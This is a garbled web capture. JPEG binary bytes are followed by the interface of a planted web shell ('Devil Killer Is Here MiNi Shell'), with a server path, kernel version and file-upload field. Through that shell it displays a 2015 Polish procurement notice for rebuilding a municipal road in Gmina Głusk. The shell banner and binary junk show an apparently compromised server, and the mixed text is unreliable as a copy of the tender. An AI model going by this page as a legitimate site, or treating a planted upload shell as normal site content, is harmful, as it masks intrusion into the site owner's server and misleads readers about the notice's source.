JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150317/59178-N-2015.html

<p class="kh_header"><b>Lublin: Przebudowa  drogi gminnej nr 112455 L Dominów - Wilczopole  na odcinku długości 1085,38 mb , na terenie  gminy Głusk realizowanej w ramach programu wieloletniego pod nazwą Narodowy program przebudowy dróg lokalnych - Etap II - Bezpieczeństwo - Dostępność - Rozwój</b><br>
<b>Numer ogłoszenia: 59178 - 2015; data zamieszczenia: 17.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Głusk Dominów , ul. Rynek 1, 20-388 Lublin, woj. lubelskie, tel. 81 7518760, faks 81 7518650.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glusk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa  drogi gminnej nr 112455 L Dominów - Wilczopole  na odcinku długości 1085,38 mb , na terenie  gminy Głusk realizowanej w ramach programu wieloletniego pod nazwą Narodowy program przebudowy dróg lokalnych - Etap II - Bezpieczeństwo - Dostępność - Rozwój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  :
 Przebudowa  drogi gminnej nr 112455 L Dominów - Wilczopole  na odcinku długości 1085,38 mb  na terenie gminy Głusk  - realizowanej w ramach programu wieloletniego pod nazwą Narodowy program przebudowy dróg lokalnych - Etap II - Bezpieczeństwo - Dostępność - Rozwój  
obejmująca następujące elementy i rodzaje robót budowlanych:

1. Przygotowanie terenu pod budowę i roboty rozbiórkowe;
2. Roboty ziemne ;
3. Krawężniki i obrzeża betonowe ;
4. Podbudowy  - betonowa i z kruszywa łamanego ;
5. Nawierzchnia  bitumiczna -  w-wa wiążąca z betonu asfaltowego AC 16W gr. 5 cm  , w-wa 
     ścieralna  z betonu asfaltowego AC 8S 50-70 gr. 4 cm;
6. Chodnik z kostki brukowej bezfazowej  gr. 6 cm   i zjazdy z kostki brukowej gr. 8 cm ;
7. Zjazdy z kruszywa łamanego  gr. 15 cm - przez rów na pola;
8. Oznakowanie pionowe i poziome , bariery ochronne  stalowe ;
9. Roboty wykończeniowe - pobocza z kruszywa łamanego , ścieki prefabrykowane  z płyt    
    korytkowych , humusowanie skarp , brukowanie skarp , umacnianie skarp płytami    
    ażurowymi ;
10. Przepusty pod zjazdami o średnicy 40 cm  ;
11 . Przepusty pod jezdnią o średnicy 80 cm   ;
12. Zabezpieczenie sieci telekomunikacyjnej ;
13. Zabezpieczenie sieci gazowej;
14. Zabezpieczenie sieci wodociągowej;
15. Pełna obsługa geodezyjna  tj. wyznaczenie geodezyjne ,  powykonawcza inwentaryzacja 
     geodezyjna drogi .
16. Zapewnienie zaplecza budowy ;
Oprócz robót drogowych zamówienie obejmuje również
  Przebudowę i zabezpieczenie istniejących sieci elektroenergetycznych 
     kolidujących z  przebudową drogi polegające na usunięciu :
 1. Kolizji nr 1 - w km 0+011,67 przebudowa słupów nr 23 i 24.
2.  Kolizji nr 2 - w km 0+865,20  - km 0+888,30 zabezpieczenie istniejących kabli energetycznych  ;
3. Kolizji nr 3 - km  1+074,67 przebudowa słupów  nr 11 i 12.
4. Demontaż linii napowietrznej.
5. Oznakowanie robót na czas budowy ( czasowa organizacja ruchu);
6. Wykonanie niezbędnych prób i badań ;
7. Prowadzenie dziennika budowy;
8. Dopełnienie wszelkich formalności   oraz uiszczenie opłat związanych z zajęciem pasa drogowego ( drogi powiatowej nr 2272 L ) na czas wykonywania robót i usuwania kolizji.
9. Bieżącego utrzymania stanu drogi przez cały okres budowy, tj. wykonywanie robót
    konserwacyjnych i porządkowych oraz podejmowanie innych działań technicznych mających na celu zapewnienie, zgodnego z potrzebami ruchu drogowego, stanu technicznego drogi oraz sprawności i bezpieczeństwa ruchu, zarówno na odcinkach gdzie nie były jeszcze prowadzone roboty budowlane, trwają roboty lub zostały zakończone   (tj. przez cały okres trwania realizacji zamówienia, aż do zakończenia i odbioru ostatecznego robót).
10.Bieżącego utrzymania w czystości dróg publicznych, po których będzie odbywał się ruch pojazdów z budowy drogi i transportujących materiały;
11. Uprzątnięcie terenu budowy ;
12. Przygotowanie rozliczenia końcowego robót i sporządzenie operatu kolaudacyjnego, który ma zawierać : protokół przekazania robót , protokoły robót zakrywanych , badania materiałów ,recepty ,wyniki pomiarów , wyniki  badań laboratoryjnych , deklaracje zgodności materiałów , aprobaty i  sprawozdania techniczne Wykonawcy , geodezyjną inwentaryzację powykonawczą w formie gis-cad i w wersji papierowej w dwóch egzemplarzach , kompletnie wypełniony dziennik budowy ,potwierdzenie zakończenia odbioru robót , oświadczenia uprawnionych kierowników robót o wykonaniu zadania zgodnie z przepisami..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Na podstawie art. 67 ust.1 pkt 6 ustawy Pzp Zamawiający zastrzega sobie prawo do udzielania Wykonawcy zamówień uzupełniających do wysokości 50% w zakresie niezbędnym dla prawidłowego wykonania zamówienia. 
Dane wyjściowe do kosztorysowania przedstawione przez Wykonawcę w załącznikach do oferty ( kosztorys ofertowy z cenami jednostkowymi ) robót podstawowych  będą miały zastosowanie do ewentualnych robót  uzupełniających, których konieczność wykonania zostanie uzgodniona pomiędzy Zamawiającym a Wykonawcą w trakcie realizacji zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.31.20-6, 45.20.00.00-9, 45.23.20.00-2, 45.23.31.42-6, 45.23.32.20-7, 45.23.32.90-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Składający ofertę obowiązany jest przed upływem terminu składania ofert wnieść wadium 
     w   wysokości  15.000,00 PLN ( słownie: piętnaście  tysięcy  złotych)
2. Termin wniesienia wadium upływa dnia  31.03.2015 r. o godz. 1000 . 
3. O uznaniu przez zamawiającego ,że wadium w pieniądzu wniesiono w wymaganym terminie,    
   decyduje data wpływu środków na rachunek Zamawiającego (środki mają być na koncie o godz.     
    1000)
4. Wadium wniesione w pieniądzu, należy wpłać  przelewem na rachunek bankowy Zamawiającego     nr :   24 8689 0007 0000 3580 2000 0060 lub w formach wymienionych w art. 45 ust 6 pkt. 2-5 ustawy Pzp. 5. Do oferty należy dołączyć dokument potwierdzający wniesienie wadium lub jego poświadczoną kopię.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej , jeśli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie  w zakresie art. 24 ust.1 pkt.2 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny  spełnienia warunku udziału polegającego na posiadaniu wiedzy i doświadczenia w oparciu o Załącznik nr  5 Wykaz wykonanych robót . Warunek zostanie uznany za spełniony , gdy wykonawca  wykaże ,że   w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - wykonał  w tym okresie, minimum dwie roboty budowlane   odpowiadające  swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia  - budowa / przebudowa drogi polegająca na wykonaniu warstw konstrukcyjnych drogi z w-wą o nawierzchni bitumicznej   z elementami chodnika z kostki brukowej  o wartości  co najmniej 1 500 000 zł brutto każda oraz minimum  2 roboty w branży elektrycznej (np.  budowa oświetlenia drogowego , zabezpieczenie kolizji elektroenergetycznej ) o wartości co najmniej 70.000 zł brutto każda wraz z podaniem ich rodzaju i wartości , daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót,  określających , czy roboty te zostały wykonane w sposób należyty oraz wskazujących , czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny  spełnienia warunku udziału polegającego na dysponowaniu osobami zdolnymi do wykonania zamówienia w oparciu o Załącznik nr 4 Wykaz osób .Warunek zostanie uznany za spełniony , gdy wykonawca  wykaże ,że  osoby ,które  będą uczestniczyć w  wykonaniu  zamówienia,    w szczególności odpowiedzialne  za kierowanie robotami budowlanymi   w specjalności drogowej -  1 osoba  i w specjalności instalacyjnej w zakresie sieci , instalacji i urządzeń elektrycznych  i elektroenergetycznych  - 1 osoba , posiadają doświadczenie zawodowe w pełnieniu funkcji kierownika budowy ww.  specjalnościach.   Wykonawca przedstawi   informację na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nich  czynności , wraz z informacją o podstawie do dysponowania  tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest posiadanie opłaconej polisy , a w przypadku jej braku , innego dokumentu   potwierdzającego, że wykonawca jest ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia  na kwotę co najmniej  1.500 000,00 zł 
- posiadanie środków finansowych lub zdolności kredytowej na kwotę nie mniejszą niż   1.500 000,00 zł
Wykonawca może polegać na wiedzy i doświadczeniu , potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia , w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.  
Przez pisemne zobowiązanie podmiotu trzeciego rozumie się oryginał zobowiązania lub kserokopię zobowiązania poświadczoną, za zgodność z oryginałem przez ten podmiot.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz OFERTA  PRZETARGOWA wg wzoru zamawiającego o treści odpowiadającej załącznikowi  nr 1 do siwz;
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia,  wykonawcy składają jeden formularz OFERTA PRZETARGOWA .
- kosztorys ofertowy wraz tabelą elementów scalonych  : 1 egz. dla przebudowy drogi  + 1 egz. na usunięcie kolizji - łącznie 2 egz.;
- pełnomocnictwo , zgodnie z art.23 ust.2 ustawy pzp, w przypadku składania oferty przez  wykonawców ubiegających się wspólnie o udzielenie zamówienia ( jeżeli dotyczy);
- dowód zapłaty wadium;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Rękojmia i gwarancja - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w zakresie dotyczącym :
1.Terminu  zakończenia zamówienia podstawowego .
1.1 Spowodowanego warunkami atmosferycznymi :
a)   wystąpienia klęsk żywiołowych,
b) w przypadku wystąpienia niekorzystnych warunków atmosferycznych odbiegających od typowych, ( długotrwałych , obfitych opadów deszczu , niskich temperatur w dzień i w nocy ) uniemożliwiających  prowadzenie robót budowlanych zgodnie z projektem budowlanym i wykonawczym  oraz SST nie pozwalające na przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów,
1.2 Spowodowane warunkami geologicznymi lub gruntowo- wodnymi  w przypadku ich ujawnienia    na placu budowy gdy uniemożliwiają one prowadzenie prac zgodnie z dokumentacją projektową.  
1.3 Spowodowane odmową wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę, 
1.4 Spowodowane wycofaniem zgody na prowadzenie robót budowlanych przez właściciela nieruchomości, 
1.5  innych przyczyn niezależnych od Wykonawcy;
2. Zmian  personelu wskazanego w ofercie Wykonawcy :
a) zmiana kierownika budowy w trakcie realizacji przedmiotu umowy musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana przez Zamawiającego, który zatwierdzi taką zmianę wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i do doświadczenia osób wskazanych w ofercie Wykonawcy;
b) Wykonawca przedłoży Zamawiającemu propozycję zmiany, o której mowa w pkt. a) nie później niż 7 dni przed planowanym do kierowania robotami/budową którejkolwiek osoby. Jakakolwiek przerwa w realizacji przedmiotu umowy wynikająca z braku kierownictwa robót (budowy) będzie traktowana jako przerwa wynikła z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do zmiany terminu zakończenia robót;
c) skierowanie, bez akceptacji Zamawiającego, do kierowania robotami innych osób niż wskazane w ofercie Wykonawcy stanowi podstawę odstąpienia od umowy przez Zamawiającego z winy Wykonawcy;
3. Zmian rozwiązań technicznych w dokumentacji projektowej wykonania robót:
a) Na wniosek Wykonawcy, za zgodą Zamawiającego w trakcie prowadzenia inwestycji,
mogą być dokonywane zmiany technologii wykonywania elementów robót. Dopuszcza
się je tylko w przypadku, gdy proponowane przez niego rozwiązanie jest równorzędne
lub lepsze funkcjonalnie od tego, jakie przewiduje projekt ,a Wykonawca nie będzie
żądał zwiększenia wynagrodzenia za wykonywane roboty.
W tym przypadku Wykonawca przedstawia projekt zamienny zawierający opis proponowanych zmian wraz z rysunkami. Projekt wymaga zatwierdzenia przez nadzór autorski /projektanta/, uzgodnienia z inspektorem nadzoru i akceptacji Zamawiającego.
b) W przypadku gdy wystąpią roboty dodatkowe nie objęte zamówieniem podstawowym  niezbędne do jego prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, Zamawiający złoży dodatkowe zamówienie na ich wykonanie w trybie wynikającym z Ustawy Prawo Zamówień Publicznych.
c) W uzasadnionych przypadkach, gdy realizacja zadania według dokumentacji technicznej i STWiOR powodowałoby wadliwe wykonanie przedmiotu umowy dopuszcza się wprowadzenie zmian w stosunku do dokumentacji projektowej.
d) W przypadku, gdy wystąpią roboty dodatkowe nieprzewidziane w dokumentacji projektowej lub kolizje nie objęte zamówieniem podstawowym ,a konieczne do wykonania przed robotami podstawowymi i mające wpływ na termin zakończenia zamówienia podstawowego, Zamawiający udzieli dodatkowego  zamówienie na ich wykonanie w trybie wynikającym z Ustawy Prawo Zamówień Publicznych.
4 . Zmian  dotycząca zakresu robót , wynagrodzenia .
a) nieprzewidziane kolizje z robotami prowadzonymi równolegle przez inne podmioty.
W takim przypadku zmiany w umowie zostaną ograniczone do zmian powodujących uniknięcie lub usunięcie kolizji .
b) okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia. W przypadku zmniejszenia zakresu przedmiotu zamówienia przez Zamawiającego, wynagrodzenie należne Wykonawcy za wykonane roboty pozostaje w takim stosunku do umownego wynagrodzenia ryczałtowego, w jakim wykonane roboty budowlane pozostają do całości robót wyszczególnionych w łączącej strony umowie. 
c) Zamawiający może udzielić wykonawcy zamówień dodatkowych, nieobjętych zamówieniem podstawowym, nie wynikających z projektów budowlano-wykonawczych, STWiOR i SIWZ zgodnie z warunkami określonymi w ustawie Pzp; 
d) zmianie uległy stawki podatku VAT, w tym przypadku wynagrodzenie netto pozostaje bez zmian - zmianie podlega wysokość należnego podatku VAT oraz kwota brutto wynagrodzenia.
e)  Zamawiający może zmienić ilości poszczególnych kategorii robót - roboty zamienne,
f ) tylko udzielenie zamówienia na roboty uzupełniające lub dodatkowe w drodze umowy upoważnia wykonawcę do żądania zapłaty za te roboty ;
5. Zmian warunków  płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu (jeśli zajdzie taka konieczność ) zadanie realizowane w ramach programu wieloletniego pod nazwą: Narodowy program przebudowy dróg lokalnych - Etap II- Bezpieczeństwo- Dostępność -Rozwój

6.  Zmian podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał się w
złożonej ofercie, na zasadach określonych w art. 26 ust. 2b ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku akceptacji przez
Zamawiającego wskazanego innego podwykonawcy po wykazaniu, iż proponowany inny
podwykonawca spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
7. Rezygnacji z podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał się w złożonej ofercie, na zasadach określonych w art. 26 ust. 2b ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku wykazania Zamawiającemu, iż Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie
postępowania o udzielenie zamówienia.
8. Innych warunków umowy, jeżeli w chwili jej zawarcia nie znane były fakty mające na nie wpływ, przy jednoczesnym założeniu, że zakres zmian spowoduje następstwa korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ugglusk.bip.lubelskie.pl<br>
